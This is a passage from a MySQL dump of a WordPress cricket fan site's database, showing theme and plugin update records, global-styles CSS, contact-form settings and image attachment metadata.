\";s:3:\"url\";s:39:\"https://wordpress.org/themes/supernews/\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/theme/supernews.3.0.5.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";s:6:\"5.6.20\";}s:11:\"the-minimal\";a:6:{s:5:\"theme\";s:11:\"the-minimal\";s:11:\"new_version\";s:5:\"1.2.6\";s:3:\"url\";s:41:\"https://wordpress.org/themes/the-minimal/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/theme/the-minimal.1.2.6.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";s:3:\"5.6\";}s:7:\"tortuga\";a:6:{s:5:\"theme\";s:7:\"tortuga\";s:11:\"new_version\";s:5:\"2.3.8\";s:3:\"url\";s:37:\"https://wordpress.org/themes/tortuga/\";s:7:\"package\";s:55:\"https://downloads.wordpress.org/theme/tortuga.2.3.8.zip\";s:8:\"requires\";s:3:\"5.2\";s:12:\"requires_php\";s:3:\"5.6\";}s:9:\"travelify\";a:6:{s:5:\"theme\";s:9:\"travelify\";s:11:\"new_version\";s:5:\"3.0.8\";s:3:\"url\";s:39:\"https://wordpress.org/themes/travelify/\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/theme/travelify.3.0.8.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";b:0;}s:15:\"twentytwentytwo\";a:6:{s:5:\"theme\";s:15:\"twentytwentytwo\";s:11:\"new_version\";s:3:\"1.3\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentytwentytwo/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentytwentytwo.1.3.zip\";s:8:\"requires\";s:3:\"5.9\";s:12:\"requires_php\";s:3:\"5.6\";}s:4:\"vega\";a:6:{s:5:\"theme\";s:4:\"vega\";s:11:\"new_version\";s:5:\"3.0.0\";s:3:\"url\";s:34:\"https://wordpress.org/themes/vega/\";s:7:\"package\";s:52:\"https://downloads.wordpress.org/theme/vega.3.0.0.zip\";s:8:\"requires\";s:3:\"4.1\";s:12:\"requires_php\";b:0;}s:7:\"verbosa\";a:6:{s:5:\"theme\";s:7:\"verbosa\";s:11:\"new_version\";s:5:\"1.2.2\";s:3:\"url\";s:37:\"https://wordpress.org/themes/verbosa/\";s:7:\"package\";s:55:\"https://downloads.wordpress.org/theme/verbosa.1.2.2.zip\";s:8:\"requires\";s:3:\"4.5\";s:12:\"requires_php\";s:3:\"5.6\";}s:12:\"wen-business\";a:6:{s:5:\"theme\";s:12:\"wen-business\";s:11:\"new_version\";s:5:\"2.0.3\";s:3:\"url\";s:42:\"https://wordpress.org/themes/wen-business/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/theme/wen-business.2.0.3.zip\";s:8:\"requires\";s:3:\"5.6\";s:12:\"requires_php\";s:3:\"5.6\";}}s:9:\"no_update\";a:1:{s:21:\"skt-construction-lite\";a:6:{s:5:\"theme\";s:21:\"skt-construction-lite\";s:11:\"new_version\";s:3:\"1.5\";s:3:\"url\";s:51:\"https://wordpress.org/themes/skt-construction-lite/\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/theme/skt-construction-lite.1.5.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";b:0;}}s:12:\"translations\";a:0:{}}','no'),(140561,'_site_transient_update_plugins','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1675179092;s:8:\"response\";a:2:{s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:49:\"w.org/plugins/all-in-one-wp-security-and-firewall\";s:4:\"slug\";s:35:\"all-in-one-wp-security-and-firewall\";s:6:\"plugin\";s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";s:11:\"new_version\";s:5:\"5.1.4\";s:3:\"url\";s:66:\"https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/\";s:7:\"package\";s:84:\"https://downloads.wordpress.org/plugin/all-in-one-wp-security-and-firewall.5.1.4.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:88:\"https://ps.w.org/all-in-one-wp-security-and-firewall/assets/icon-256x256.png?rev=2798307\";s:2:\"1x\";s:88:\"https://ps.w.org/all-in-one-wp-security-and-firewall/assets/icon-128x128.png?rev=2798307\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:91:\"https://ps.w.org/all-in-one-wp-security-and-firewall/assets/banner-1544x500.png?rev=2798307\";s:2:\"1x\";s:90:\"https://ps.w.org/all-in-one-wp-security-and-firewall/assets/banner-772x250.png?rev=2798307\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.0\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";s:3:\"5.6\";}s:9:\"hello.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:25:\"w.org/plugins/hello-dolly\";s:4:\"slug\";s:11:\"hello-dolly\";s:6:\"plugin\";s:9:\"hello.php\";s:11:\"new_version\";s:5:\"1.7.2\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/hello-dolly/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/hello-dolly.1.7.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-256x256.jpg?rev=2052855\";s:2:\"1x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-128x128.jpg?rev=2052855\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/hello-dolly/assets/banner-1544x500.jpg?rev=2645582\";s:2:\"1x\";s:66:\"https://ps.w.org/hello-dolly/assets/banner-772x250.jpg?rev=2052855\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.6\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";b:0;}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:0:{}s:7:\"checked\";a:3:{s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";s:5:\"4.4.8\";s:9:\"hello.php\";s:3:\"1.6\";s:23:\"wp-cerber/wp-cerber.php\";s:5:\"8.8.5\";}}','no'),(140609,'_transient_doing_cron','1675210614.4148619174957275390625','yes'),(140610,'_transient_timeout_global_styles_the-minimal','1675210379','no'),(140611,'_transient_global_styles_the-minimal','body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--duotone--dark-grayscale: url(\'#wp-duotone-dark-grayscale\');--wp--preset--duotone--grayscale: url(\'#wp-duotone-grayscale\');--wp--preset--duotone--purple-yellow: url(\'#wp-duotone-purple-yellow\');--wp--preset--duotone--blue-red: url(\'#wp-duotone-blue-red\');--wp--preset--duotone--midnight: url(\'#wp-duotone-midnight\');--wp--preset--duotone--magenta-yellow: url(\'#wp-duotone-magenta-yellow\');--wp--preset--duotone--purple-green: url(\'#wp-duotone-purple-green\');--wp--preset--duotone--blue-orange: url(\'#wp-duotone-blue-orange\');--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}','no');
/*!40000 ALTER TABLE `wp_options` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_pluginSL_spam_captcha`
--

DROP TABLE IF EXISTS `wp_pluginSL_spam_captcha`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_pluginSL_spam_captcha` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `id_comment` mediumint(9) NOT NULL,
  `status` varchar(10) DEFAULT 'ok',
  `new_status` varchar(10) DEFAULT 'ok',
  `author` text DEFAULT NULL,
  `content` text DEFAULT NULL,
  `captcha_info` text DEFAULT NULL,
  `date` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  UNIQUE KEY `id_post` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_pluginSL_spam_captcha`
--

LOCK TABLES `wp_pluginSL_spam_captcha` WRITE;
/*!40000 ALTER TABLE `wp_pluginSL_spam_captcha` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_pluginSL_spam_captcha` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_postmeta`
--

DROP TABLE IF EXISTS `wp_postmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=230 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_postmeta`
--

LOCK TABLES `wp_postmeta` WRITE;
/*!40000 ALTER TABLE `wp_postmeta` DISABLE KEYS */;
INSERT INTO `wp_postmeta` VALUES (1,2,'_wp_page_template','default'),(2,4,'_form','<label> Your Name (required)\n    [text* your-name] </label>\n\n<label> Your Email (required)\n    [email* your-email] </label>\n\n<label> Subject\n    [text your-subject] </label>\n\n<label> Your Message\n    [textarea your-message] </label>\n\n[submit \"Send\"]'),(3,4,'_mail','a:8:{s:7:\"subject\";s:39:\"Yorkshire Cricket Fans \"[your-subject]\"\";s:6:\"sender\";s:52:\"[your-name] <wordpress@yorkshirecricketboard.org.uk>\";s:4:\"body\";s:196:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n--\nThis e-mail was sent from a contact form on Yorkshire Cricket Fans (https://yorkshirecricketboard.org.uk)\";s:9:\"recipient\";s:25:\"leads@vanillacircus.co.uk\";s:18:\"additional_headers\";s:22:\"Reply-To: [your-email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(4,4,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:39:\"Yorkshire Cricket Fans \"[your-subject]\"\";s:6:\"sender\";s:63:\"Yorkshire Cricket Fans <wordpress@yorkshirecricketboard.org.uk>\";s:4:\"body\";s:138:\"Message Body:\n[your-message]\n\n--\nThis e-mail was sent from a contact form on Yorkshire Cricket Fans (https://yorkshirecricketboard.org.uk)\";s:9:\"recipient\";s:12:\"[your-email]\";s:18:\"additional_headers\";s:39:\"Reply-To: zoe.allen@vanillacircus.co.uk\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(5,4,'_messages','a:23:{s:12:\"mail_sent_ok\";s:45:\"Thank you for your message. It has been sent.\";s:12:\"mail_sent_ng\";s:71:\"There was an error trying to send your message. Please try again later.\";s:16:\"validation_error\";s:61:\"One or more fields have an error. Please check and try again.\";s:4:\"spam\";s:71:\"There was an error trying to send your message. Please try again later.\";s:12:\"accept_terms\";s:69:\"You must accept the terms and conditions before sending your message.\";s:16:\"invalid_required\";s:22:\"The field is required.\";s:16:\"invalid_too_long\";s:22:\"The field is too long.\";s:17:\"invalid_too_short\";s:23:\"The field is too short.\";s:12:\"invalid_date\";s:29:\"The date format is incorrect.\";s:14:\"date_too_early\";s:44:\"The date is before the earliest one allowed.\";s:13:\"date_too_late\";s:41:\"The date is after the latest one allowed.\";s:13:\"upload_failed\";s:46:\"There was an unknown error uploading the file.\";s:24:\"upload_file_type_invalid\";s:49:\"You are not allowed to upload files of this type.\";s:21:\"upload_file_too_large\";s:20:\"The file is too big.\";s:23:\"upload_failed_php_error\";s:38:\"There was an error uploading the file.\";s:14:\"invalid_number\";s:29:\"The number format is invalid.\";s:16:\"number_too_small\";s:47:\"The number is smaller than the minimum allowed.\";s:16:\"number_too_large\";s:46:\"The number is larger than the maximum allowed.\";s:23:\"quiz_answer_not_correct\";s:36:\"The answer to the quiz is incorrect.\";s:17:\"captcha_not_match\";s:31:\"Your entered code is incorrect.\";s:13:\"invalid_email\";s:38:\"The e-mail address entered is invalid.\";s:11:\"invalid_url\";s:19:\"The URL is invalid.\";s:11:\"invalid_tel\";s:32:\"The telephone number is invalid.\";}'),(6,4,'_additional_settings',''),(7,4,'_locale','en_US'),(8,2,'_edit_lock','1481899465:1'),(9,5,'fw_options','a:0:{}'),(10,2,'_edit_last','1'),(11,2,'_yoast_wpseo_content_score','30'),(12,6,'fw_options','a:0:{}'),(13,1,'_edit_lock','1481901738:1'),(14,7,'fw_options','a:0:{}'),(15,1,'_edit_last','1'),(18,1,'_yoast_wpseo_content_score','60'),(19,8,'fw_options','a:0:{}'),(20,1,'_wp_old_slug','hello-world'),(21,1,'_yoast_wpseo_primary_category','2'),(22,9,'_wp_attached_file','2016/12/cricket-player.jpg'),(23,9,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:662;s:4:\"file\";s:26:\"2016/12/cricket-player.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"cricket-player-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"cricket-player-300x207.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:207;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"cricket-player-768x530.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:22:\"the-minimal-post-thumb\";a:4:{s:4:\"file\";s:24:\"cricket-player-60x60.jpg\";s:5:\"width\";i:60;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"the-minimal-feature-thumb\";a:4:{s:4:\"file\";s:26:\"cricket-player-300x220.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"the-minimal-slider\";a:4:{s:4:\"file\";s:26:\"cricket-player-960x500.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"the-minimal-slider-thumb\";a:4:{s:4:\"file\";s:24:\"cricket-player-63x46.jpg\";s:5:\"width\";i:63;s:6:\"height\";i:46;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:22:\"the-minimal-image-full\";a:4:{s:4:\"file\";s:26:\"cricket-player-960x498.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:498;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"the-minimal-image\";a:4:{s:4:\"file\";s:26:\"cricket-player-750x400.jpg\";s:5:\"width\";i:750;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24,1,'_thumbnail_id','9'),(27,11,'_wp_attached_file','2016/12/cricket-grounds.jpg'),(28,11,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:540;s:4:\"file\";s:27:\"2016/12/cricket-grounds.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"cricket-grounds-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"cricket-grounds-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"cricket-grounds-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:22:\"the-minimal-post-thumb\";a:4:{s:4:\"file\";s:25:\"cricket-grounds-60x60.jpg\";s:5:\"width\";i:60;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"the-minimal-feature-thumb\";a:4:{s:4:\"file\";s:27:\"cricket-grounds-300x220.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"the-minimal-slider\";a:4:{s:4:\"file\";s:27:\"cricket-grounds-960x500.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"the-minimal-slider-thumb\";a:4:{s:4:\"file\";s:25:\"cricket-grounds-63x46.jpg\";s:5:\"width\";i:63;s:6:\"height\";i:46;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:22:\"the-minimal-image-full\";a:4:{s:4:\"file\";s:27:\"cricket-grounds-960x498.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:498;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"the-minimal-image\";a:4:{s:4:\"file\";s:27:\"cricket-grounds-750x400.jpg\";s:5:\"width\";i:750;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(29,10,'_edit_last','1'),(30,10,'_edit_lock','1481900156:1'),(31,10,'_thumbnail_id','11'),(34,10,'_yoast_wpseo_content_score','30'),(35,12,'fw_options','a:0:{}'),(36,10,'_yoast_wpseo_primary_category','3'),(37,13,'_edit_last','1'),(38,13,'_edit_lock','1481900274:1'),(39,14,'_wp_attached_file','2016/12/kids-cricket.jpg'),(40,14,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:621;s:4:\"file\";s:24:\"2016/12/kids-cricket.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"kids-cricket-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"kids-cricket-300x194.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"kids-cricket-768x497.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:497;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:22:\"the-minimal-post-thumb\";a:4:{s:4:\"file\";s:22:\"kids-cricket-60x60.jpg\";s:5:\"width\";i:60;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"the-minimal-feature-thumb\";a:4:{s:4:\"file\";s:24:\"kids-cricket-300x220.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"the-minimal-slider\";a:4:{s:4:\"file\";s:24:\"kids-cricket-960x500.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"the-minimal-slider-thumb\";a:4:{s:4:\"file\";s:22:\"kids-cricket-63x46.jpg\";s:5:\"width\";i:63;s:6:\"height\";i:46;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:22:\"the-minimal-image-full\";a:4:{s:4:\"file\";s:24:\"kids-cricket-960x498.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:498;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"the-minimal-image\";a:4:{s:4:\"file\";s:24:\"kids-cricket-750x400.jpg\";s:5:\"width\";i:750;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(41,13,'_thumbnail_id','14'),(44,13,'_yoast_wpseo_content_score','30'),(45,15,'fw_options','a:0:{}'),(46,13,'_yoast_wpseo_primary_category','4'),(47,16,'_edit_last','1'),(48,16,'_edit_lock','1481900396:1'),(49,17,'_wp_attached_file','2016/12/cricket-honours.jpg'),(50,17,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:926;s:6:\"height\";i:720;s:4:\"file\";s:27:\"2016/12/cricket-honours.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"cricket-honours-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"cricket-honours-300x233.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"cricket-honours-768x597.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:597;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:22:\"the-minimal-post-thumb\";a:4:{s:4:\"file\";s:25:\"cricket-honours-60x60.jpg\";s:5:\"width\";i:60;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"the-minimal-feature-thumb\";a:4:{s:4:\"file\";s:27:\"cricket-honours-300x220.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"the-minimal-slider\";a:4:{s:4:\"file\";s:27:\"cricket-honours-926x500.jpg\";s:5:\"width\";i:926;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"the-minimal-slider-thumb\";a:4:{s:4:\"file\";s:25:\"cricket-honours-63x46.jpg\";s:5:\"width\";i:63;s:6:\"height\";i:46;s:9:\"mime-typ